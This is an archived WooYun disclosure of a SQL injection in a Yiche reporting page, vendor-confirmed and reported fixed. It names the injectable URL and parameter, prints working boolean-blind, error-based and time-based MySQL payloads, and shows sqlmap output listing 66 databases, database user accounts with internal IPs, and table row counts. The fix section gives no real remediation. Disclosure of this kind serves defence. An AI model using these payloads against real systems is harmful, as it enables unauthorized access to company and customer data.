当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-097947

漏洞标题:易车某业务SQL注入漏洞66个库

相关厂商:易车

漏洞作者: 几何黑店

提交时间:2015-02-22 12:04

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-22: 细节已通知厂商并且等待厂商处理中
2015-02-22: 厂商已经确认,细节仅向厂商公开
2015-03-04: 细节向核心白帽子及相关领域专家公开
2015-03-14: 细节向普通白帽子公开
2015-03-24: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

恭喜发财,红包拿来

详细说明:

QQ图片20150221222644.png


QQ图片20150221220640.png


注入点:http://dmp.op.cig.com.cn/report/area/index?t=1&deep=
参数:t=1

漏洞证明:

---
Parameter: t (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: t=1' AND 4647=4647 AND 'cPDg'='cPDg&deep=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: t=1' AND (SELECT 9734 FROM(SELECT COUNT(*),CONCAT(0x716a6b6271,(SELECT (CASE WHEN (9734=9734) THEN 1 ELSE 0 END)),0x717a6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'khji'='khji&deep=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: t=1' AND SLEEP(5) AND 'buEq'='buEq&deep=
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [66]:
[*] bitauto_data_stat
[*] bitsmart
[*] carsv2222
[*] cheyisou
[*] cig_achievement
[*] cig_ad_sys_t
[*] cig_adsense
[*] cig_adsense_report
[*] cig_audience_package
[*] cig_blog_department
[*] cig_blog_easyad
[*] cig_crm
[*] cig_crmv2
[*] cig_institution
[*] cig_jiesuan
[*] cig_luxgen
[*] cig_mrm
[*] cig_mst
[*] cig_op
[*] cig_opv2
[*] cig_survey
[*] cig_tracking_report
[*] cig_urlanalytic
[*] cigdc_attribute
[*] cigdc_buffer
[*] cigdc_dealer
[*] cigdc_logmanage
[*] cigdc_monitor
[*] cigdc_page
[*] cigdc_pool
[*] cigdc_private_package
[*] cigdc_report
[*] cigdc_server
[*] cigdc_system
[*] cigdc_tagmanager
[*] cigdc_tagmanager_report
[*] cigdc_tagmanager_url
[*] cigdc_tagmanager_url_result
[*] cigdc_task
[*] cigdc_yiche
[*] cigdc_yiche_tuisong
[*] diamond
[*] diamond-production
[*] easyad_buffer
[*] easyad_mattar
[*] easyad_monitor
[*] easyad_report
[*] easyad_system
[*] easyad_task
[*] iBitAutotemp
[*] information_schema
[*] innodb
[*] mysql
[*] performance_schema
[*] test
[*] testdb
[*] visitor_bqcx
[*] web_db
[*] yiche_ad_sys
[*] yiche_ad_sys_t
[*] yiche_auto_index
[*] yiche_dad
[*] yiche_dad_report
[*] yiche_dad_t
[*] yiche_domainuser
[*] yiche_tag


[*] ''@'AD_DB01'
[*] ''@'localhost'
[*] 'audience_package'@'%'
[*] 'auto_index_car'@'%'
[*] 'auto_index_data'@'%'
[*] 'auto_index_web'@'%'
[*] 'bitsmart'@'%'
[*] 'cig_ad_sys_t'@'%'
[*] 'cig_adsense'@'%'
[*] 'cig_adsense_car'@'%'
[*] 'cig_adsense_repo'@'%'
[*] 'cig_crmv2'@'%'
[*] 'cigdc_logmanage'@'%'
[*] 'cigdc_server'@'%'
[*] 'cigdc_tagmanager'@'%'
[*] 'cigdc_task'@'%'
[*] 'cigdc_yiche'@'%'
[*] 'cigdc_yiche_api'@'%'
[*] 'dad_manager'@'%'
[*] 'dad_report_web'@'%'
[*] 'dad_test'@'%'
[*] 'easyad_system'@'%'
[*] 'easyad_xiaol'@'%'
[*] 'mlmuser'@'%'
[*] 'opv2'@'%'
[*] 'private_package'@'%'
[*] 'Repluser'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.1.141'
[*] 'root'@'::1'
[*] 'root'@'AD_DB01'
[*] 'root'@'localhost'
[*] 'user_cig_opv2'@'%'
[*] 'user_easyad_syst'@'%'
[*] 'web_db'@'192.168.1.141'
[*] 'yiche_ad_sys'@'%'
[*] 'yiche_ad_sys_t'@'%'
[*] 'yiche_dad_report'@'%'
[*] 'yiche_tag'@'%'


Database: cigdc_yiche
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| StyleD | 3864110 |
| StylePropertyValue | 3725077 |
| StyleJoinColor | 96574 |
| entitylogitem | 88680 |
| dealer | 53512 |
| dealerMap | 42141 |
| dealerBrand | 41561 |
| Style | 36029 |
| Style2 | 36029 |
| a_style_to_model | 35728 |
| tbl | 34109 |
| WhiteCoverImages | 19194 |
| ModelColor | 12132 |
| yearpropertyvalue | 7588 |
| Model | 2599 |
| a_model_to_brand | 2582 |
| a_model_to_make | 2582 |
| cx_model | 1947 |
| area | 1891 |
| ModelAutohome | 1631 |
| yichebaa_brandforumlist | 852 |
| cx_make | 639 |
| StyleProperty | 420 |
| cx_masterbrand | 397 |
| Make | 293 |
| a_make_to_brand | 287 |
| tag_tree | 264 |
| MasterBrand | 254 |
| Manufacturer | 241 |
| temp | 53 |
| StylePropertyGroup | 31 |
| cx_url_rule | 24 |
| ModelLevel | 19 |
| Country | 15 |
| tag_path | 14 |
| yichebaa | 13 |
| emaillogreceiver | 11 |
| path_car | 11 |
| `Use` | 10 |
| ModelBodyForm | 10 |
| SyncDataReceiver | 4 |
+-------------------------+---------+

修复方案:

你懂的

版权声明:转载请注明来源 几何黑店@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-02-22 17:09

厂商回复:

非常感谢对易车的帮助,我们会尽快处理

最新状态:

2015-03-02:

2015-03-02:已经修复,非常感谢对易车的支持